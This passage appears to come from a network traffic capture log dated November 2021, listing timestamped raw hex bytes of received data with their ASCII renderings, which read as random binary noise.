                                            Data Ascii: n8fk]dCcNi h"3 I8q=ejVnxg|>(K.$ 2@EfvFSMv#Z/\Lk{Yeqo;HBjw(!6> |F~/iv+tkC-%b=FktqMM]s.ltqv7-f&|A~vU <_.
                                            2021-11-22 13:23:12 UTC47INData Raw: 39 c4 20 24 89 f3 32 e1 73 c9 78 71 f3 9f 70 57 7a 5d e6 d0 51 c2 30 52 c2 d3 4c 72 16 47 4e 22 9d e5 d0 b7 a5 d5 27 a3 4d f5 fc 58 89 0f 59 a3 cd de 48 34 b9 84 3a 23 04 52 da 02 b2 2f aa 43 94 ff de 72 51 c0 de a3 b3 e0 7b 15 32 fd 0f 05 29 2e cc f0 20 d5 a7 9d 02 16 d4 4a 16 00 0a f4 82 23 2a fc 5e a1 db ab 2e 69 b3 13 36 fa fe 4d c9 cd 15 a9 c0 b5 29 81 bc 2c 75 22 a9 34 ab 5a 70 dc dc d8 1a 89 5a 33 19 12 13 83 f3 c5 22 91 9d e0 1a d3 47 44 07 6a 39 df cc 18 99 24 47 55 5c 1c 9c d7 7b 90 f3 d7 cd e1 da b9 9b 5c 83 9e dc 3b 03 7d 14 57 fe fe 42 b3 b6 9e 22 4a f6 1e 94 27 f1 1e a0 03 38 0e 4c f3 1e 67 1a 7b ad 76 51 1f d7 3e ad 4e c8 ad 29 a3 70 0c 18 b2 e6 89 5e 03 30 6b 95 ec 95 0a f6 d0 01 8f 73 71 e8 b3 5d 18 de ae 4b 92 cc d4 5a cc e4 6d e7 48 52
                                            Data Ascii: 9 $2sxqpWz]Q0RLrGN"'MXYH4:#R/CrQ{2). J#*^.i6M),u"4ZpZ3"GDj9$GU\{\;}WB"J'8Lg{vQ>N)p^0ksq]KZmHR
                                            2021-11-22 13:23:12 UTC48INData Raw: e4 a2 84 5e 15 15 0b ff 3b 86 42 4d 09 1a 3f 79 3d 28 85 21 87 dc 1d 25 04 c1 d8 66 5d c1 21 cd 7d 17 b0 09 f9 c1 01 4d 15 df a6 1d f1 23 f8 7f 7c 4e 42 1e 15 8a ae 9d 64 4a d7 85 65 94 20 30 f3 00 cd 9e ef ba de b4 07 2a 57 ff 5a 96 5c cf bb ef 63 e2 58 37 da b3 7e ba 05 7e 40 cb 7b 49 a5 fe 2b d5 b0 1e c4 73 0f 54 c5 1a 29 99 da 9e 70 57 c9 a0 db 77 e7 54 54 c8 98 d2 5c f8 0a b9 5f 71 2e f8 9a 74 7d c7 9e d9 d9 0b e7 c9 d1 81 a8 0b 91 dd 3a dc bc 69 28 37 f0 30 7c bf 78 57 fe 64 d1 d0 92 c0 d6 fd 3e 29 b2 06 08 eb 48 0c 02 d0 07 c1 7d d5 ee d0 ea 6e df cb c0 26 82 17 a2 5d 5c f6 8f 07 6b 5a 59 14 b0 91 ee b0 1b ae d2 f9 25 27 7b 57 1e a9 52 35 96 6b 67 92 65 6f ec 2b c7 d2 6b 5a ae 1e c1 c2 0f 8e b2 44 ed 3d 40 01 bc 2f 1d b5 04 86 4e 19 6a 19 f7 4b 3e
                                            Data Ascii: ^;BM?y=(!%f]!}M#|NBdJe 0*WZ\cX7~~@{I+sT)pWwTT\_q.t}:i(70|xWd>)H}n&]\kZY%'{WR5kgeo+kZD=@/NjK>
                                            2021-11-22 13:23:12 UTC49INData Raw: 6c 0c df 35 f6 5a 06 a7 9d 09 1a d5 0f 65 7e 08 f4 84 6e 3e ed 5b c3 72 c4 09 61 b9 13 27 fe fd 4d cb f4 16 ba d3 dc 22 d0 bf 2a 1c 2e b3 36 ad 4d 0b 0b cf b7 35 55 54 10 5e 03 11 83 ff d8 1e 81 21 e3 10 0b 28 68 7b 46 3e ce cc 21 9a 49 50 52 74 45 8d cf 55 7e eb d5 c7 ca 2c a1 95 4e 91 be c4 00 2b 4a 0f 38 a3 f3 6a 81 6a 8f 2c be f6 18 bf 0e ed 1e a2 03 c4 08 e1 46 3d 69 14 61 ad 76 52 1f 0e 0f 0e 2e 86 a3 27 b9 70 0c 1b a9 4f 88 26 4e 33 65 95 b2 95 0a fc 93 b1 8f 3b 7a e2 b5 49 37 df bf 50 aa 56 fd 5a ca cd 27 e2 59 52 10 ff 5e 21 80 c4 a3 f9 a4 6d a8 eb 89 20 ea 94 ed e3 2a e9 99 d6 27 73 0b 59 ab 40 92 b7 3a 45 71 20 71 fd 08 5b 73 fe 6e d8 d1 50 52 07 b6 be ba 51 23 20 00 87 02 00 29 53 32 a3 ab 80 9c 39 54 75 9c 1e 27 8d c1 f2 29 87 d5 4a 9c d2 14
                                            Data Ascii: l5Ze~n>[ra'M"*.6M5UT^!(h{F>!IPRtEU~,N+J8jj,F=iavR.'pO&N3e;zI7PVZ'YR^!m *'sY@:Eq q[snPRQ# )S29Tu')J
                                            2021-11-22 13:23:12 UTC50INData Raw: ff 1e b0 7d f1 5d 28 9e ce 83 9e dc b3 c1 21 fb 87 86 ff 88 d9 16 42 07 e8 ea 79 26 33 10 41 25 a3 c4 34 e7 51 52 50 49 f9 8e 7c e6 a8 5b 98 f1 78 a4 35 7a df be 58 75 3e 1c 22 04 99 cd cf b3 8d 74 4b 65 4b 9a dc 84 87 2c 77 9f 13 cb 67 11 a6 bc 3a 29 1d 85 a9 26 9a 2e b0 48 bc c7 de 74 5b 02 fc a4 97 fb 6b 15 33 fd 0f 33 29 c1 79 f0 3b d5 a7 9d 02 16 d4 40 16 b8 08 f4 82 11 2a fc 5e a1 db ab 2e 69 b3 6b db d6 ff 47 c1 9b 91 ab c0 b9 12 d7 c1 02 72 0a b5 1e bc 5e 1f 1c d1 d1 38 97 57 16 37 0d 88 83 f9 c3 22 35 9d e0 1a 1e 43 53 7d 6e 09 df c8 3a a3 21 41 58 a9 ed 9d d7 7d a9 ee fd 58 e7 b5 75 88 54 98 48 fa df 28 4a 12 7f 3e f2 6a 81 9e 55 29 94 fc 77 72 27 ed 14 b3 05 31 20 d0 ef 3c 6d 3c 77 af 76 56 0c d0 1f aa 7f 83 ab 2c 64 19 0e 19 a9 c0 9b 58 48 ea
                                            Data Ascii: }](!By&3A%4QRPI|[x5zXu>"tKeK,wg:)&.Ht[k33)y;@*^.ikGr^8W7"5CS}n:!AX}XuTH(J>jU)wr'1 <m<wvV,dXH
                                            2021-11-22 13:23:12 UTC51INData Raw: 51 93 59 de 69 c9 62 88 2e f4 4f 13 bf 24 26 29 bf e4 24 43 cf 8d 3c 47 65 16 6c 22 f6 a8 ed 26 93 14 01 e8 18 eb 83 67 1f 01 03 bb 4b d6 7a f9 86 17 00 46 2c c9 e0 eb 71 cd 30 d2 0e 3d b8 1e 97 27 57 4d 13 c6 73 d2 e2 17 d8 52 13 c7 49 0d 1e ea 1f 8c 62 51 d4 b4 32 1d 21 3a 2b 11 c1 a5 e1 b8 51 b5 07 61 4e b7 4b 9f 74 40 ba b6 69 cf 67 45 d1 9b f1 07 04 74 6d eb 08 6b a7 fe 2d c6 bc 0f c8 62 06 3d ed 18 29 51 ca 92 61 88 a7 84 d9 62 e1 45 58 c3 92 bd 7b e9 3a ba 4e 7c 07 54 99 1a 7b a8 a5 cd ca 08 d9 2a dd ee bf 0a 80 d2 fb d9 67 40 33 3f f9 20 b9 bf 4f 64 ed 61 db 1f 97 cf 20 eb c4 08 b2 15 09 e0 31 dd 69 2f f2 21 45 50 c2 d1 ec 17 58 cc d7 43 65 3f fc 54 74 25 a6 9c 61 3b 7b ef 2d 91 e4 92 e7 3a d2 f3 07 6c ce 56 14 af 22 bb 84 6e 6d 94 0f fe 13 2a e1
                                            Data Ascii: QYib.O$&)$C<Gel"&gKzF,q0='WMsRIbQ2!:+QaNKt@igEtmk-b=)QabEX{:N|T{*g@3? Oda 1i/!EPXCe?Tt%a;{-:lV"nm*
                                            2021-11-22 13:23:12 UTC52INData Raw: 1c 88 84 3a 29 0f 5a a9 20 ae 2e ac 48 a9 c7 de 72 41 1e de a5 82 d1 68 15 72 fc 0f 03 58 dd 35 e1 46 75 a7 9d 09 07 9a 75 16 5c 00 dc 5a 7e 2a fa 58 bd 5c ab 2e 69 94 12 4e dd 22 52 cc e5 02 75 d4 96 29 e5 bf 2c 79 19 b5 30 a0 74 27 1a dc d2 cd 5e 55 16 31 5b 2f 83 f9 c3 22 71 9e e0 16 1a 28 7f 79 46 32 d3 c0 5f 3f 27 47 59 79 46 8c d9 6b ab e7 ed 0f e7 b5 7f 8a 52 98 4d 48 0d 2e 34 28 57 f4 f9 42 52 b5 9e 2e 85 f3 30 9a 26 ed 14 b7 6c 05 08 4c e5 2f 61 3c 73 ac 76 5a 0e d1 26 77 51 84 ab 48 0b 71 0c 13 dd c4 8a 5e 44 5f 7f 94 b2 9f 19 ec b2 bd a7 a8 78 e2 b3 4c 85 de ae 45 ce c9 d6 5a d1 df 33 f5 4e 7c da ea c2 36 e9 61 b4 65 bf 1f a2 fd 15 2a ff 85 e9 77 2a e7 0d 77 ac b8 25 44 bd dc a8 a0 21 42 e5 19 97 e0 1e c1 71 f1 03 ec 4f 41 52 0b b5 b9 2c 51 20
                                            Data Ascii: :)Z .HrAhrX5Fuu\Z~*X\.iN"Ru),y0t'^U1[/"q(yF2_?'GYyFkRMH.4(WBR.0&lL/a<svZ&wQHq^D_xLEZ3N|6ae*w*w%D!BqOAR,Q
                                            2021-11-22 13:23:12 UTC54INData Raw: f4 10 99 a3 e3 ff 5b df 96 26 2c 30 36 e4 16 ef 65 e5 92 57 a0 11 08 3e b6 4b 97 63 da 92 04 6a cf 61 33 c6 b3 b5 ba 05 7e 7b 67 20 68 a6 fe 2b ee 20 0f c8 68 69 1d ef 18 2f b4 f8 83 64 74 4a 87 d9 71 8e d8 58 d9 98 91 5f eb 0c ae 4b 55 ea 57 99 72 6e be 9c 9f d8 0d eb cf 47 c6 54 09 91 d1 f1 c5 b1 05 1e 37 fa 2c f5 dd 76 6d fe 62 ca 08 ba 3c dd ea ee 55 90 15 00 fc 58 23 6f 40 ef 3f 55 72 fc da 83 da 5b ca ca 16 41 c1 03 a1 82 e6 b6 96 1e 61 53 3c 2d bd e2 ab 39 4e e9 f9 2f 49 a1 01 1e a3 37 6e 86 63 7a 53 19 ef fc 23 dc b4 6c ec 91 6e 2c 38 d8 fe a4 61 c3 79 c4 00 b6 36 12 d7 bb ae d5 13 61 3b e7 e4 3d ad aa b4 48 2c 93 9f 39 41 69 55 0b 29 ec 46 1b 10 7f 57 5e 2c 9d 0e a9 be d7 6d 30 01 ec ff 64 a1 80 3a 4d 11 4b bc 11 59 77 7d bf 74 f0 8f 19 3b 51 0f
                                            Data Ascii: [&,06eW>Kcja3~{g h+ hi/dtJqX_KUWrnGT7,vmb<UX#o@?Ur[AaS<-9N/I7nczS#ln,8ay6a;=H,9AiU)FW^,m0d:MKYw}t;Q
                                            2021-11-22 13:23:12 UTC55INData Raw: 0a cb 00 48 4b 05 23 25 02 91 e6 db f4 a8 b1 f9 01 07 51 d8 51 46 3c df ce 26 a6 08 47 53 7e 59 df 13 7c b8 ea ca de f4 a7 7f 8a 4e 96 4b 2c 1f 07 41 05 59 e5 fe f0 98 b1 81 24 87 e4 18 af 34 f6 e0 a1 2f 32 76 df ef 3c 6d 07 67 b1 65 42 1f c6 1c b2 75 7a ac 0b b5 61 01 08 a7 58 3d 6c 8d 2f 43 86 a0 95 1b f5 bc 9b 71 72 57 e9 c6 01 35 df a8 5c b2 c4 f7 49 d8 cc 25 f6 57 58 f8 e8 ee 2d 97 d4 a2 e8 ea 6b b0 fc 06 3e fd 82 ed 60 00 72 92 cf d4 2b 0c 42 b7 cf 8a ae 2b 40 ff 31 66 f2 01 d7 9c f9 5c c5 5c 50 45 08 25 bb 2d 5f 34 2c 18 91 8f 03 33 b2 38 99 3d ef 09 26 58 69 13 0a 3c 81 de e4 a4 84 cc 4d 6c c5 a4 75 b4 7e a6 79 f6 4a 5e 42 77 4c a9 b4 d1 1c 30 ea 84 5b 65 0f 82 a8 89 15 54 12 eb c6 5d 01 8a 56 bf 54 27 e3 18 5e 01 99 c0 0e 36 7c 4c e7 c7 49 2b 0d
                                            Data Ascii: HK#%QQF<&GS~Y|NK,AY$4/2v<mgeBuzaX=l/CqrW5\I%WX-k>`r+B+@1f\\PE%-_4,38=&Xi<Mlu~yJ^BwL0[eT]VT'^6|LI+
                                            2021-11-22 13:23:12 UTC56INData Raw: 17 44 03 5c 72 ac b4 dd b6 ee e0 d8 d7 f8 41 08 ce fb fc c2 92 50 0f ad e6 2b 64 a3 40 f5 91 ad db 0e 98 c9 04 85 07 3a ba 1d 0c eb 55 23 79 b5 d0 34 51 78 eb bf 12 1d 5b c0 d1 27 9b 2f eb 88 c6 d8 ac 98 6b 5c 3c c2 2c 91 e4 e5 1f 4e c3 f2 3e 58 54 40 0f a8 2c a2 0d 04 a4 85 0a ed fa f1 a2 52 e2 5b a4 07 d7 d6 2c 31 a1 53 3d d4 d2 11 b7 34 05 b3 d7 34 ba d0 6a 13 d5 fc e7 c8 9b b6 4e 0c 87 b3 4a 63 2a 61 0d 3a ff 57 1e 7f e0 57 5e 26 cd 3e 87 af 66 64 5f 29 f8 ff 62 b0 91 2b 4b 7e 6f be 11 5f 60 6c ae 71 5c a8 1b 3b 9e 1f 67 cb 66 00 fd f3 bc 59 7d 98 ca af f7 b9 00 ba 74 53 d9 bd 18 9a a4 e0 a7 0e f1 a9 14 dd 08 2d 9a e2 97 eb 65 3a 34 70 f8 68 99 fd 68 7b 7e b5 00 ca af 5e a7 41 29 9e c0 b8 9b ad 09 c7 09 a0 89 ae c1 a0 c1 1e 9c 03 81 06 70 0c 39 8f 53
                                            Data Ascii: D\rAP+d@:U#y4Qx['/k\<,N>XT@,R[,1S=44jNJc*a:WW^&>fd_)b+K~o_`lq\;gfY}tS-e:4phh{~^A)p9S
                                            2021-11-22 13:23:12 UTC58INData Raw: 19 ff 2a ad 52 8e bb 0f 5e 71 0c 13 81 f1 8a 5e 55 23 6e 84 b7 bd 3b e7 a3 b1 a2 78 08 58 b5 23 3d d4 73 92 ba db d6 4b cf e4 68 e4 48 52 0b e0 ea d3 85 d3 b3 4d 51 68 b0 fb 3d 6c ec 8d fd 6c 3f e6 ab 26 b8 62 0b 6a 5a df 83 b7 0e 0e ed 31 71 f3 18 ce 4a 10 73 ce 4b 69 bd 1b bf ae 0e 1d 25 3f 0c 82 96 18 07 50 3d b5 31 b9 87 22 58 65 28 52 21 92 ca f7 b2 9f fb 4b 96 c4 8e 50 ba 76 8e 9b de 17 58 51 74 5f a1 af eb 32 23 f8 9d 42 b3 20 ae a1 bb 71 7b 41 98 fb 4f 12 9e 45 a7 57 31 d4 e2 77 c8 90 d1 05 30 ac 77 cd d8 6e 32 70 2c f9 a6 48 e2 a3 4c 1f e3 ca 9d fa 43 61 14 4e b1 17 0a ec 80 e5 ed 90 9c c2 1b 22 33 5c 8c e5 dc 10 96 ff 49 25 bb 3f 8e f1 e2 ae 46 cb e5 87 56 f6 6e d6 41 f7 73 82 35 2e 20 eb a8 01 08 0f b5 cc fe 53 c4 f8 e9 6d 67 1c 61 0c df a2 82
                                            Data Ascii: *R^q^U#n;xX#=sKhHRMQh=ll?&bjZ1qJsKi%?P=1"Xe(R!KPvXQt_2#B q{AOEW1w0wn2p,HLCaN"3\I%?FVnAs5. Smga
                                            2021-11-22 13:23:12 UTC59INData Raw: ff f9 53 df 50 c8 79 b1 8d 97 6b 6c 27 1b ef f9 3f d9 95 41 5b ae 1e fa d6 27 20 bb 57 ec 5f c0 28 20 25 15 ae 1e be fd f0 6b 13 d5 f5 3b 7d 63 6c 51 29 85 b2 11 dd 28 61 01 36 fe 6e f2 11 29 5d 88 33 ee 52 73 ad 72 64 21 04 d2 15 65 a1 8a b6 12 11 4b bd 39 6a 70 7d b5 78 22 88 0e ed 8b 08 67 e5 7b 0d c3 cb 2c 8c 80 90 e4 35 e6 a8 65 a7 ab 41 fb 9b 08 8d 78 db 99 1d e1 be 09 cb 2d d2 65 17 58 e2 74 c6 27 79 a8 7d 88 ee 56 d8 83 4a ff 14 ba 7b f5 77 29 9e b0 aa 89 de a1 c7 09 aa 9e 86 f9 a1 da 24 45 01 81 2d 79 26 47 ce 4f 11 89 f9 36 f1 34 bf 79 71 f3 91 29 0b a0 5f f1 b5 71 a5 31 58 c2 ba 70 ef 16 4d 2b 2c f9 e4 d6 bb 80 01 02 a2 4b 90 c5 5c 98 0f 4b 80 3b cf 6d 1a 99 09 3d 29 17 5a ba 28 a1 27 ba 36 d8 c7 de 76 f9 0f d6 b0 8d c9 a3 14 32 f7 1e 05 3d f5
                                            Data Ascii: SPykl'?A[' W_( %k;}clQ)(a6n)]3Rsrd!eK9jp}x"g{,5eAx-eXt'y}VJ{w)$E-y&GO64yq)_q1XpM+,K\K;m=)Z('6v2=
                                            2021-11-22 13:23:12 UTC60INData Raw: 3c 5f a1 1a c7 64 f2 79 e6 0f 45 54 1e 97 86 24 40 23 17 ef 90 9e 1b 07 d0 39 b5 3d 82 9c 2f 70 f4 03 0f 27 ba e2 e6 b5 90 fb b0 93 c4 82 50 39 72 8e 97 e5 4e 5e 79 82 50 b0 a1 eb 32 23 f8 9d 7c 7e 0f ae ab 99 fb 55 12 e1 ca 4a 14 b0 c1 ad 46 3e ed c8 5d 2d 95 f9 e6 20 aa 55 c2 44 6e 38 15 17 fe b7 48 db 84 5f 17 8a f8 b7 d4 45 70 17 49 48 79 3d e9 a8 cd fe 99 b2 f4 37 0c 35 33 ac f1 22 17 cf c2 47 5e a0 e3 29 fb 3c a1 72 e5 fa a9 54 fc 7b ca 41 e1 73 82 35 e6 0e 75 ce 06 22 38 b3 df fc 51 c7 a3 04 6f 67 10 05 0c e5 a2 84 20 9a 05 0d 96 32 86 44 61 0e 03 28 12 9d 2b 84 27 96 69 28 31 17 cf f1 e2 75 82 25 dc 7d 69 92 1c 96 4e 07 5c 1b a3 b8 0d f7 38 2e 30 60 e5 41 1e 15 8a ac 9d 6b 73 88 9e 0a 1b 4e 18 f7 13 c1 9e ef 83 56 da 23 22 7a b1 5a 94 65 45 92 ed
                                            Data Ascii: <_dyET$@#9=/p'P9rN^yP2#|~UJF>]- UDn8H_EpIHy=753"G^)<rT{As5u"8Qog 2Da(+'i(1u%}iN\8.0`AksNV#"zZeE
                                            2021-11-22 13:23:12 UTC61INData Raw: 82 3d 22 d8 4b bc 1b 4e 8f 7f e0 58 07 fd 3b 39 98 08 65 ee 7b 09 f5 9a fb 71 7f 9e dd a4 f7 ac 00 89 77 53 d5 bd 05 8a 1d d5 b5 1f e7 a9 0e cb 5c d6 65 1b e9 c8 70 ec 21 7f f8 6c e7 f9 57 d8 89 94 ea 31 92 4c 8f 76 23 8d c4 d8 33 de b3 cd 04 82 bc 86 f9 aa 1f 2d 53 10 90 fa 6a 37 28 df 5e 12 05 44 0b 3f a5 a1 87 60 ff 99 a0 2b ae 4c e0 cb 69 9a ba ac 37 43 86 66 33 65 16 04 9f ef c5 be fe c8 24 a3 41 97 fe 62 89 09 55 76 11 cd 47 15 a4 84 3a 68 23 5b a9 20 b0 2f ac 8d bc c7 de af 5b 1e de 06 98 e1 6b 00 32 fd 0f 19 29 dd 34 f0 35 cf a7 cf 03 0d e4 ce 17 5c 0a 2d 83 7d 2a e9 4f d2 61 b1 2e 63 b8 06 78 d5 ff ba cd e5 02 2f c0 b3 10 c4 ac 2a 4b c0 b1 36 ab 5c 0e 1c cb 26 11 7b 57 0e 22 23 13 92 ff d0 f4 a8 b1 e6 12 1e 43 58 6a 40 38 ce ce 2b 70 27 6b 5f 65
                                            Data Ascii: ="KNX;9e{qwS\ep!lW1Lv#3-Sj7(^D?`+Li7Cf3e$AbUvG:h#[ /[k2)45\-}*Oa.cx/*K6\&{W"#CXj@8+p'k_e
                                            2021-11-22 13:23:12 UTC63INData Raw: 6a 46 38 c5 7a 4e 2a 89 ce 3a bd bb 58 f1 f8 e8 38 1f 04 67 b7 49 ef 8a 86 17 8c ee 03 eb 42 6d 3d cd b6 78 2c 72 91 e4 e2 86 c5 7e 0e 25 2a 3a 86 44 dc 16 90 72 51 4d b3 34 ae 42 3c a1 63 7f c3 80 49 f7 5d 3a 69 cf 73 1e 2e f7 3f 39 a2 77 bc 29 b2 d3 f9 5f b5 17 42 6a 78 18 4a b1 e7 a2 82 ad 83 13 14 f6 09 f8 d8 76 18 14 29 00 29 38 82 38 81 10 92 22 10 d6 f2 fc c1 d0 26 c3 68 10 24 0f 91 57 14 5b 8f dd a8 13 e2 24 6c 74 14 d8 55 3e ec 99 a5 8c fe 4a d8 83 1d 0b bd 21 f2 0c df 99 7a 83 56 aa 1e 00 fa b7 4b 9d e8 51 bd f0 73 d9 fb 37 d7 84 ea ad 99 65 6a e2 14 7d 3b ef 2a d9 a1 2f 48 62 06 3b 71 09 2e 80 d5 b2 e1 5c a6 84 45 66 e6 5a 47 cf 0e ac 7d e5 2a 9f b1 7d 06 54 05 65 7c b7 95 cd 45 1c e6 c7 ff f8 23 1b 96 c8 c7 c5 05 50 18 28 d4 1a ef b2 50 6f 62
                                            Data Ascii: jF8zN*:X8gIBm=x,r~%*:DrQM4B<cI]:is.?9w)_BjxJv))88"&h$W[$ltU>J!zVKQs7ej};*/Hb;q.\EfZG}*}Te|E#P(Pob
                                            2021-11-22 13:23:12 UTC64INData Raw: d0 77 96 84 86 f3 88 96 10 42 07 e8 9c 78 26 33 6c 5e 19 93 8d 08 e7 5b 54 50 29 fd 8e 70 57 18 5c e6 d0 db b5 28 4b b6 80 58 73 1c 65 78 00 9f e3 b9 01 8c 72 2e 01 5a 83 da 52 9a 18 49 bb 03 f3 b3 1e 8e 84 2b 38 06 4b 33 2d b9 16 60 4a bc c7 d7 1d ea 1f de ae 8a f2 7d 06 20 c5 be 01 29 dd 24 e3 24 dd 3d 8e 07 04 f5 4d 79 ec 0b f4 88 6e 2f 8f 2e d3 61 a1 3d 65 a8 10 60 8c fb 4d cb 8a b0 aa c0 b9 15 2c be 3a 8d 0b a0 33 83 07 1b 1a da b7 a2 56 54 1c 25 db 12 95 07 c8 1b ac b5 bc 14 0d 41 2d cb 47 38 d5 dc ce 8f 30 b9 52 14 5e 9a ff 20 bc ea d3 a2 55 b4 7f 91 48 77 41 c4 e0 2a 2a 05 52 dc ad 6e 8b b0 f1 9a 95 f6 12 aa d8 ec 08 5e 02 58 57 75 f9 3e 67 14 12 8f 74 50 19 c4 04 b7 df 91 ad 27 b8 63 16 08 b3 c0 a2 05 5b 30 6d 37 a3 8f 1d cf ff bf 8f 75 d9 f3 af
                                            Data Ascii: wBx&3l^[TP)pW\(KXsexr.ZRI+8K3-`J} )$$=Myn/.a=e`M,:3VT%A-G80R^ UHwA**Rn^XWu>gtP'c[0m7u
                                            2021-11-22 13:23:12 UTC65INData Raw: 2d ae 8f bd 42 43 96 d8 51 44 bb ea 03 6a 24 e6 b1 86 38 1c a3 1d c8 3d 92 4d e9 a8 1c e3 05 ab 3a 8f 0c 89 17 0a 22 1d c0 f1 e0 c7 e9 48 d8 7b 00 90 3a 96 48 0a ef 02 c6 b8 da e4 38 e1 6f 02 d9 72 ff 1b 17 12 9a 53 6c c9 8f 01 14 af 87 e4 17 49 38 f1 48 42 aa 14 2c 51 a8 5a 99 65 4c b2 fe 62 55 4f 4c d4 9b f7 93 21 74 6d f7 aa 7a ac e9 fb d5 b7 1e c4 75 d0 28 e1 09 25 8e d4 a3 ba 2f 49 85 d9 7d f2 4c 49 dd 81 9c 6c e9 2a 87 fc 78 06 54 88 55 6a 88 2e c8 cc 1c f4 c1 ca f7 cc fa 90 d7 ee c0 88 50 0e 23 d8 bb 6d b2 56 79 73 63 db 0e 93 c5 ca fe c0 99 ba 17 0a d2 04 32 69 25 74 01 55 78 ec c3 fe 0c 49 dd 4c 13 8a 3f fd 76 e4 f0 a7 96 43 00 53 3c 26 86 38 37 18 3b d2 f8 3c 46 d8 45 13 b5 2e a1 bf 45 6f 85 0c f4 e2 3d de a9 91 79 ac 14 d4 d4 37 31 a0 50 c3 25
                                            Data Ascii: -BCQDj$8=M:"H{:H8orSlI8HB,QZeLbUOL!tmzu(%/I}LIl*xTUj.P#mVysc2i%tUxIL?vCS<&87;<FE.Eo=y71P%
                                            2021-11-22 13:23:12 UTC66INData Raw: 9e 87 c2 5a ba ab 8c 78 a3 1d 97 9c f6 40 61 95 72 53 b0 b6 d5 03 28 2e 88 43 8a 1a b8 92 e0 76 43 0a 3d ca 5a 39 d1 47 be 55 1f d4 c1 4e 0a fc f6 01 21 ac 4e e4 cf e3 3f 1f 04 fa b5 6c e2 88 4b 06 9b 62 a0 fa 45 71 bf 4e 94 6c 04 40 80 e3 f6 b1 ee e2 1f 28 1d d9 a7 e7 d6 3e 44 ef 40 40 84 1a 8e fb 36 ce 4b e1 d2 81 47 eb 6a 0a 7a d8 62 8c 28 7d 27 35 bd 25 33 1e a4 ea e2 51 d8 07 6c 6d 67 17 c8 35 c1 b6 aa 9f 92 14 01 e6 36 08 7b 67 1f 0a 2f 3e 02 29 85 2d bc 29 1f 3d 00 44 e7 ea 5d c0 32 ff 6a 25 ae 0f 81 c4 3f 4d 13 cd 0d 1d d4 26 d8 cb 13 c7 49 01 6c 15 9a 8c 62 5a c9 b4 f8 1c 21 3a cf 4f 38 70 19 85 42 a6 16 37 69 a1 73 18 76 40 ba fe 66 e7 29 22 d0 9d 9e a2 04 74 67 d0 19 7a a8 d6 7d c2 bc 09 a7 7b 07 3b e7 21 ed 9f cb 92 70 4a b9 8d 0f 64 f9 54 4c
                                            Data Ascii: Zx@arS(.CvC=Z9GUN!N?lKbEqNl@(>D@@6KGjzb(}'5%3Qlmg56{g/>)-)=D]2j%?M&IlbZ!:O8pB7isv@f)"tgz}{;!pJdTL
                                            2021-11-22 13:23:12 UTC67INData Raw: 81 64 fb 39 a8 c9 ae 02 e3 1f da 73 0c 8a ea fc 5b 2f f7 5e 49 9e ef 56 d2 97 46 ee 18 b6 6f 9c 7a 20 10 7d a3 07 69 83 03 00 24 33 91 23 b7 17 99 7d 01 87 2d 6a 23 2e c7 c1 b7 9c 29 27 f6 48 53 53 69 e8 8b 67 35 bf 87 ef cb 74 30 39 43 c5 ab 82 e7 77 d3 30 09 88 33 c5 bc 9c 7f 35 b2 7a 78 c7 5f 07 be 48 72 04 1d e0 23 8e 84 3b 3a 11 4d b8 25 3e 98 b4 92 af d5 cd 7c 70 4c cf a1 88 ef ff 04 36 ec 01 97 f3 cb 1a e8 24 c9 b6 93 12 08 f5 47 82 7c f5 f4 82 7d fc ed 4b c3 6f 3f f4 fd 92 05 59 d0 ee 43 dc e0 13 a5 54 a2 05 c3 b1 b8 a9 94 b7 27 ad 4d 11 8e f4 32 11 57 5e 3e e5 24 13 89 d1 ed 0a a9 97 ea 01 03 50 94 6a 48 29 d1 d9 22 bf 8e 99 5c 51 67 a8 d7 7d b2 f9 da e5 df b5 7f 91 82 89 46 f8 1e 6a 56 14 57 f4 f3 6a 8b b0 9e 28 94 e6 1a be 26 fb 1c a0 03 37 08
                                            Data Ascii: d9s[/^IVFoz }i$3#}-j#.)'HSSig5t09Cw035zx_Hr#;:M%>|pL6$G|}Ko?YCT'M2W^>$PjH)"\Qg}FjVWj(&7
                                            2021-11-22 13:23:12 UTC68INData Raw: e7 72 2e 62 e0 91 95 1d 25 a7 e7 d6 07 96 ff 48 25 8e 3f 8e f1 2f a5 10 c5 d3 87 5c ef 74 cd 60 d8 1c ab 3e f0 2a 24 b4 33 4f 12 b4 cc fe 5f d7 06 78 6d 67 17 79 2e f9 2f a9 31 92 15 18 fc 1f 95 4e 6e 91 bc 11 36 b4 29 8f 36 94 10 1f 39 1e 47 57 f4 75 d7 20 dc 71 17 bc 00 87 4d 16 53 3b da ae 0c fd 23 f9 74 19 a8 64 1f 13 93 b4 85 73 5e b0 b4 0b 1d 2b 21 fc 7c ec 8e e6 98 5a b2 04 36 79 39 fc f2 58 41 ba e5 7a c8 4f 34 d1 9b fb aa 02 1b 79 fc 08 61 ab f6 27 18 a9 2a e0 55 06 3b e7 0b 22 b7 e5 90 61 5a ac ac e1 77 e1 4f 86 d9 94 97 7a fa 4b a3 4e 7d 06 54 99 74 7b a8 b4 db ee 0c e1 d8 ea ef bf 0a 84 d7 e4 d3 83 41 1f 36 eb 0a 69 b2 31 6f fe 64 4b 0e 92 c0 ad 8b e9 3a b0 1a 09 95 ab 33 69 25 eb 38 57 50 8b d1 ec 17 48 cf d1 2a 9b 3a ea 4f 59 7e 10 f3 9d 5b
                                            Data Ascii: r.b%H%?/\t`>*$3O_xmgy./1Nn6)69GWu qMS;#tds^+!|Z6y9XAzO4ya'*U;"aZwOzKN}Tt{A6i1odK:3i%8WPH*:OY~[
                                            2021-11-22 13:23:12 UTC70INData Raw: c8 9e 5d 73 16 d8 21 04 8e 96 6c b1 8d 78 2e d0 b0 9b d6 50 85 01 77 d5 17 cb 6b 34 f0 80 3a 2f 3f cc aa 20 b6 5c 50 49 bc cd b1 8f 5a 1e d4 ac b1 9e 6f 15 34 d5 8f 07 29 db 1d 67 36 cf a1 ee ff 0c e4 43 79 a1 0b f4 88 75 02 81 4b d2 67 83 af 67 b9 13 60 41 fc 4d cb 96 fe aa c0 b9 6e 2f be 2c 79 02 99 49 af 5c 19 32 5e dc 10 51 7c 81 32 25 15 f0 05 c8 0a a3 f2 1d 11 0d 4d 4a 51 c5 3c df ce 18 0a 22 47 55 5c d8 9c d7 7b cb 16 d4 cd ed da 82 9a 5c 83 48 fa 9d 2f 4a 12 7f 70 f7 6a 8d 9e 1b 2c 94 f0 6b 42 27 ed 14 cf fe 39 08 46 e7 14 e1 10 61 ab 5e d4 1b d7 08 85 d5 80 ad 21 ca 8c 0d 19 a3 b9 77 5f 5f 3a 63 bd 3a 91 0a e1 8b 32 8b 73 7d ca 22 20 37 d9 dd b3 bb db dc 35 